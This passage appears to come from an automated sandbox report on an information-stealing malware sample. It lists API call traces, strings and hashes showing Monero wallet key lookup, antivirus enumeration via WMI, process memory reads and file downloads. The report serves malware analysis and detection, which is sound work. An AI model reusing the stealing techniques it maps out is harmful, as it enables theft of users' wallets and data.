                                                                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                                                                                                                  • String ID: GET
                                                                                                                                                                                                                                                                                                  • API String ID: 442264750-1805413626
                                                                                                                                                                                                                                                                                                  • Opcode ID: c8598b76782b08933c13cff9c97261692f6bb3eeeac1fb73a4ca9257dacd5c94
                                                                                                                                                                                                                                                                                                  • Instruction ID: d281c038e4fc1d43085ff1e335aac5a1d2015f5d0f0e8fc3e36784ae5f7bfe4e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8598b76782b08933c13cff9c97261692f6bb3eeeac1fb73a4ca9257dacd5c94
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF6164B5A00219ABEB20DBA4DC45FEFB7B9EB49710F104129FA15F72C0D7789904CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00401D40 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 199memorystringregistryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00401D74
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401D8A
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00401D91
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,004021A1), ref: 00401DAE
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(004021A1,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401DC8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00401DE0
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 00401DED
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,.keys), ref: 00401E08
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00401F8D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heaplstrcatmemset$AllocCreateObjectOpenProcessQuerySingleSleepThreadValueWaitlstrcpylstrlen
                                                                                                                                                                                                                                                                                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                                                                                  • API String ID: 1905561306-218353709
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5bda73edc0443aef9e82f0dd98887af7bd8fa38de16dcd6028e2dc442075adf6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4c9a7f9921557c481f332da0f174eeeaaaca44ebdec2039f9a6925745ca66f22
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5bda73edc0443aef9e82f0dd98887af7bd8fa38de16dcd6028e2dc442075adf6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A719F71900258AACB14EBE4DC46BEDBB79AF19304F54416EF605B31D2EB782708CBB5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040FB20 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 200stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 0040FB4B
                                                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000), ref: 0040FB73
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040FB94
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040FBD0
                                                                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 0040FC2B
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040FC38
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040FC7E
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040FCCA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • N0ZWFt, xrefs: 0040FC79, 0040FC89
                                                                                                                                                                                                                                                                                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040FBE6, 0040FCE3
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strlen$Processmemset$MemoryOpenRead
                                                                                                                                                                                                                                                                                                  • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                                                                                                                                                                                                                                  • API String ID: 47329967-1622206642
                                                                                                                                                                                                                                                                                                  • Opcode ID: ac08f08a54ba4f489be152c76e8d335287841f802f75ba7ca1997f6a51422f70
                                                                                                                                                                                                                                                                                                  • Instruction ID: 20f69977443de8948ddffc0f4a3381c49359371f896369b3d50972fa4481eb24
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac08f08a54ba4f489be152c76e8d335287841f802f75ba7ca1997f6a51422f70
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80612571D00208ABEB309B91DC45BEFB678AF84714F14413EF915B76C1D7BC598887A9
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 004111E0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 136comCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418,00000000,?,00000000,00000000), ref: 00411203
                                                                                                                                                                                                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418), ref: 00411214
                                                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(00427D04,00000000,00000001,00427C34,?,?,00000000,?,AV: ,00000000,?,00427418,00000000,?,00000000,00000000), ref: 0041122E
                                                                                                                                                                                                                                                                                                  • CoSetProxyBlanket.OLE32(00427418,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418,00000000), ref: 00411267
                                                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 004112C2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004115F0: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,004112EB,?,?,00000000,?,AV: ,00000000,?,00427418,00000000,?,00000000), ref: 004115F8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004115F0: CharToOemW.USER32(?,00000000), ref: 00411605
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 004112FD
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: InitializeVariant$AllocBlanketCharClearCreateInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: Select * From AntiVirusProduct$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                                                                                                                  • API String ID: 685420537-2776955613
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5fbc72881901a930d909b08e693eb3415aed348d33cd1dd08cc58bbd85476723
                                                                                                                                                                                                                                                                                                  • Instruction ID: 771bfa06b1ee6aab49511a194e20b68bd9ee86493e24a2358091a886c33ff084
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5fbc72881901a930d909b08e693eb3415aed348d33cd1dd08cc58bbd85476723
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1415A71B01229ABCB24DB95DC45EEFBB78EF49B50F10411AF615A7290C678AA01CBE4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00410800 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 210registrystringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(00000000,01566098,00000000,00020019,00000000,004270A7,?,00000001), ref: 0041085F
                                                                                                                                                                                                                                                                                                  • RegEnumKeyExA.KERNEL32(00000000,?,?,0042750C,00000000,00000000,00000000,00000000,?,?,00000001), ref: 004108BE
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004108E7
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 00410905
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,01572148,00000000,000F003F,?,00000400), ref: 00410935
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 0041094A
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,015720B8,00000000,000F003F,?,00000400,00000000,004219B1,?,00000000,?,004270D8), ref: 004109CE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
                                                                                                                                                                                                                                                                                                  • String ID: - $%s\%s$?
                                                                                                                                                                                                                                                                                                  • API String ID: 1989970852-3278919252
                                                                                                                                                                                                                                                                                                  • Opcode ID: ab5f312c3f732c128b1771b3ab0d6ee776d6e09258c729d89f25b68380dbf8b9
                                                                                                                                                                                                                                                                                                  • Instruction ID: f9f4651bf3973da61bec05af46e24bbf11bae8a96c478798f350ddba051ec134
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab5f312c3f732c128b1771b3ab0d6ee776d6e09258c729d89f25b68380dbf8b9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7816B7190422DABCB14DB94DC84EEEB7B9FF59704F10416EF605B3281DB786A08CBA4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00413B80 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 161stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405A80: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AF8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405A80: StrCmpCA.SHLWAPI(?,0156F958,?,?,?,?,?,?,00000004), ref: 00405B10
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405A80: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B34
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405A80: HttpOpenRequestA.WININET(00000000,GET,?,015724D8,00000000,00000000,-00400100,00000000), ref: 00405B6B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405A80: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B8F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413C14
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00422019), ref: 00413C2B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004116D0: LocalAlloc.KERNEL32(00000040,?,?,00000001,00000004,?,00413C40,00000000,00000000), ref: 004116EC
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00413C57
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00413C6C
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00413C89
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internetlstrcpylstrlen$Open$AllocConnectHttpLocalOptionRequest
                                                                                                                                                                                                                                                                                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                                                                  • API String ID: 2440237315-1526165396
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6d3e98a88f886c359271a77fae815b0e1c5059f1360d4e4e151493efacfc2543
                                                                                                                                                                                                                                                                                                  • Instruction ID: c127ad534209f32346ea4566e2f3d6fae2444d447a8e8f5fff74df097b54c808
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d3e98a88f886c359271a77fae815b0e1c5059f1360d4e4e151493efacfc2543
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F151C330901258DACB10EBA5C9117DDBBA5AF19308F5000BEE905732D2DB7C6F08C7EA
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00410D30 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 133memorystringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410D68
                                                                                                                                                                                                                                                                                                  • GetVolumeInformationA.KERNEL32(00421A29,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410DA1
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410DED
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00410DF4
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00410E31
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00427080), ref: 00410E40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410CD0: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410CE5
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00410E62
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411B50: malloc.MSVCRT ref: 00411B61
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411B50: strncpy.MSVCRT ref: 00411B71
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00410E90
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heaplstrcat$AllocCurrentDirectoryInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                                                                                                                  • String ID: :\$C
                                                                                                                                                                                                                                                                                                  • API String ID: 2389002695-3309953409
                                                                                                                                                                                                                                                                                                  • Opcode ID: d6705a00220cc022f61928ee9874d8f35f6da8f4b6566dbd53bd07c02a58f791
                                                                                                                                                                                                                                                                                                  • Instruction ID: 480affee391e33356010d181296b11b1904528edf9fade7e017b84c509911b2e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6705a00220cc022f61928ee9874d8f35f6da8f4b6566dbd53bd07c02a58f791
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8741C371901218ABDB10EBE4DC05BEEBB79EF08704F10015EFA05B7281EBB85A44C7E5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 004058C0 Relevance: 15.1, APIs: 10, Instructions: 142networkfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405925
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0156F958,?,?,?,?,?,?,0000000B), ref: 00405951
                                                                                                                                                                                                                                                                                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,-00800100,00000000), ref: 00405976
                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,?,0000000B), ref: 00405999
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 004059B2
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,000000FF,0041FFE8,00000000,?,?,?,?,?,?,0000000B), ref: 004059D6
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 00405A00
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000400,?,?,?,?,?,?,0000000B), ref: 00405A1C
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405A23
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405A2A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
